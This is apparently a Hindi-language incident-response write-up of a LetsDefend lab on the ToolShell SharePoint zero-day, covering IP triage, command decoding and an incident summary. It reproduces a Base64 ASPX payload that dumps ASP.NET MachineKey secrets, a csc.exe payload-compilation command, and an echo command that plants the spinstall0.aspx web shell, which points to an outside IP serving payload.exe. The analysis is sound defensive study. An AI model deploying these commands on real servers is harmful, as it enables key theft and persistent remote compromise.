
CVE-2025-53770 (ToolShell) SharePoint ज़ीरो-डे शोषण का विस्तृत विवरण, जिसमें RCE विश्लेषण, MachineKey निष्कासन, पेलोड संकलन, वेब शेल तैनाती, और घटना प्रतिक्रिया रोकथाम चरण शामिल हैं।
मैंने LetsDefend लैब में ToolShell (CVE-2025-53770) नामक SharePoint ज़ीरो-डे का विश्लेषण किया। मैंने एक वास्तविक दुनिया के ज़ीरो-डे हमले की नकल की जहाँ एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell चलाया, payload.exe संकलित किया और एक वेब शेल (spinstall0.aspx) छोड़ा। मैंने सब कुछ लॉग किया, व्यवहार का विश्लेषण किया और होस्ट को कंटेन किया। यह README हमले की प्रक्रियाओं, हमले को रोकने के कदमों और सीखे गए सबक को कवर करता है।
यह एक गंभीर अलर्ट और संदिग्ध गतिविधि है जिसने MS SharePoint के ToolPane.aspx को बड़े पेलोड और स्पूफ़ किए गए Referer के साथ लक्षित किया। CVE संदर्भ CVE-2025-53770 से जुड़ा हुआ है। यह SharePoint की एक गंभीर भेद्यता है जिसका शोषण विशेष रूप से तैयार किए गए POST अनुरोध के माध्यम से किया जाता है, जिसने बिना प्रमाणीकरण वाले हमलावरों को अनुमति दी। सफल शोषण के परिणामस्वरूप सर्वर पर रिमोट कोड एक्सीक्यूशन (RCE) हुआ। मैंने इसे सक्रिय, उच्च-आपातकालीन स्थिति के रूप में माना और जब तक अन्यथा साबित न हो, संभावित सफल समझौता माना।
Microsoft SharePoint उद्यम सहयोग और दस्तावेज़ प्रबंधन के लिए एक प्लेटफ़ॉर्म है — अनिवार्य रूप से फ़ाइलों, वर्कफ़्लो और आंतरिक वेब ऐप्स के लिए एक सुरक्षित, संगठित केंद्र।
दस्तावेज़ प्रबंधन: संस्करण नियंत्रण, ऑडिट ट्रेल और फ़ाइल अनुमतियाँ
सहयोग: कई उपयोगकर्ता एक साथ संपादित कर सकते हैं और दस्तावेज़ साझा कर सकते हैं
इंट्रानेट / पोर्टल: आंतरिक समाचार, HR नीतियाँ, डैशबोर्ड
वर्कफ़्लो और स्वचालन: फ़ॉर्म, अनुमोदन और सूचनाएँ
एकीकरण: Teams, Outlook, Office ऐप्स और Power BI से कनेक्ट होता है
प्रमाणीकरण के लिए Active Directory या SSO का उपयोग करता है
डेटा आराम की स्थिति (at rest) और ट्रांज़िट में एन्क्रिप्टेड होता है
गलत कॉन्फ़िगरेशन होने पर वेब पार्ट्स और लेआउट का दुरुपयोग हो सकता है
ज़ीरो-डे शोषण से बचाव के लिए नियमित पैचिंग महत्वपूर्ण है
Microsoft SharePoint Server में एक गंभीर ज़ीरो-डे जो हमलावरों को बिना प्रमाणीकरण के दूरस्थ रूप से कोड चलाने की अनुमति देता है। यह असुरक्षित डी-सीरियलाइज़ेशन का दुरुपयोग करता है और पूर्ण सिस्टम अधिग्रहण के लिए अक्सर अन्य SharePoint कमज़ोरियों (CVE-2025-49704, CVE-2025-49706) के साथ चेन किया जाता है। CVSS 9.8 (गंभीर) रेटेड और जंगल में सक्रिय रूप से शोषित।
मैंने प्रेषक के IP पते (Source IP Address) का विश्लेषण VirusTotal के साथ किया
स्रोत IP पता: 107.191.58.76

इससे मैं देख सकता हूँ कि 15/95 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया है, जो पहले से ही इस IP के बारे में बहुत कुछ कहता है।
अब मुझे IP का स्थान खोजना है। यह AbuseIPDB की सहायता से किया गया और जैसा नीचे दिखाया गया है, यह IP हैकिंग, ब्रूट-फोर्स, वेब ऐप हमले, पोर्ट स्कैन, DNS पॉइज़निंग के लिए जाना जाता है।

इसे हल करने वाले एक SOC विश्लेषक के रूप में, उठाया जाने वाला एक महत्वपूर्ण कदम एंडपॉइंट विश्लेषण है। मैंने आगे के विश्लेषण के लिए एंडपॉइंट सुरक्षा पर 'SharePoint01' नाम से होस्ट की खोज की, और यह IP हैकिंग के लिए जाना जाता है।

होस्ट का पता लगाने के बाद, मैंने कमांड लाइन की जाँच करने के लिए टर्मिनल इतिहास देखा

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==
पेलोड के कारण, मैंने नीचे दिखाए अनुसार कमांड को डिकोड करने के लिए Base64 डिकोडर का उपयोग किया

उपयोगकर्ता ने सिस्टम निर्देशिका “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” से PowerShell लॉन्च किया और एन्कोडेड कमांड के साथ ASP.NET सर्वर-साइड C# स्क्रिप्ट चलाई।
पेलोड होस्ट के लिए ASP.NET MachineKey को पढ़ने और लीक करने का प्रयास करता है — एक गुप्त कुंजी जिसका उपयोग ViewState/डी-सीरियलाइज़ेशन टोकन जाली बनाने और प्रमाणीकरण बायपास तथा रिमोट कोड एक्सीक्यूशन सक्षम करने के लिए किया जा सकता है। यह ToolShell शोषण पैटर्न (MachineKey का दुरुपयोग) से मेल खाता है। Base64 डिकोड और एनकोड के उपयोग से कमांड में समझौते के प्रमुख संकेतक (IoCs):
हमलावर ने निजी कॉन्फ़िगरेशन तक पहुँचने का प्रयास किया और इसका शोषण करने का लक्ष्य रखा, इसलिए .NET का दुरुपयोग किया। Base64 डिकोडर से हम System.Web.Configuration.MachineKeySection और GetApplicationConfig देख सकते हैं: MachineKeySection में शामिल है:
ये कुंजियाँ व्यूस्टेट (ViewState) और फ़ॉर्म प्रमाणीकरण की सुरक्षा के लिए उपयोग की जाने वाली गुप्त कुंजियाँ हैं। इन्हें प्राप्त करना सीरियलाइज़्ड ASP.NET पेलोड को जाली बनाने/मान्य करने की अनुमति देने वाली सामग्री प्राप्त करने का सीधा प्रयास है → डी-सीरियलाइज़ेशन-आधारित RCE के लिए प्रत्यक्ष पूर्व-शर्त।
जैसा ऊपर दिखाया गया है, ठीक तीन सेकंड बाद, हमलावर ने एक और कमांड भेजा

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.
जैसा ऊपर दिखाया गया है, ठीक दो सेकंड बाद, हमलावर ने एक और कमांड भेजा

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.
जैसा ऊपर दिखाया गया है, ठीक पाँच सेकंड बाद, हमलावर ने एक और कमांड भेजा
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
ये गतिविधियाँ एक सुसंगत पैटर्न दिखाती हैं और मैं इसे उच्च-विश्वास के साथ समझौता किया हुआ मानूँगा और तुरंत फोरेंसिक आर्टिफैक्ट एकत्र करूँगा।
सभी कमांड और निष्कर्ष एकत्र करने के बाद, मैंने थ्रेट इंटेल में आगे शोध किया और डेटा प्रकार IP द्वारा खोज की। डेटा स्रोत OnlyHunt और TAG CVE-2025-53770 दिखाता है और अलर्ट जाँच चैनल के लिए Referer: /_layouts/SignOut.aspx के साथ यह दर्शाता है कि यह एक वैध SharePoint था जिसे स्पूफ़ किया गया या उपयोग किया गया और बाद में SharePoint से साइन आउट कर दिया गया ताकि ऐसा प्रतीत हो कि यह एक सामान्य SharePoint क्रिया से उत्पन्न हुआ है। उस बिंदु पर, मैंने होस्ट को कंटेन कर लिया।
दिनांक/समय: 2025-07-2213:07 (घटना) विश्लेषक: [YourName] केस आईडी: SOC342 होस्ट: SharePoint01 गंभीरता: गंभीर
मैंने 2025-07-22 13:07 पर ToolShell (CVE-2025-53770) नामक एक गंभीर ज़ीरो-डे भेद्यता शोषण प्रयास देखा, जो SharePoint01 होस्टनाम वाले ऑन-प्रिमाइसेस SharePoint Server में हुआ। हमलावर ने, एक ज्ञात दुर्भावनापूर्ण IP (107.191.58.76) से — जो POST का स्रोत और पेलोड होस्ट है — प्रमाणीकरण को बायपास करके सर्वर पर रिमोट कोड चलाया। हमलावर ने SharePoint LAYOUTS निर्देशिका में spinstall0.aspx अपलोड/बनाई और ASP.NET MachineKey सामग्री पढ़ने तथा csc.exe के माध्यम से C# पेलोड संकलित करने के लिए PowerShell निष्पादित किया। इस प्रकार, उन्हें विश्वसनीय पेलोड तैयार करने की अनुमति मिली। यह गतिविधि SharePoint में spinstall0.aspx के साथ वेब-शेल तैनाती, MachineKey एक्सफ़िल्ट्रेशन और होस्ट-पर पेलोड संकलन के अनुरूप है — ये सभी समझौते के उच्च-विश्वास वाले संकेतक हैं।
समझौते का पता लगाने के बाद, मैंने विश्लेषक नोट में निम्नलिखित कदम उठाने की अनुशंसा की: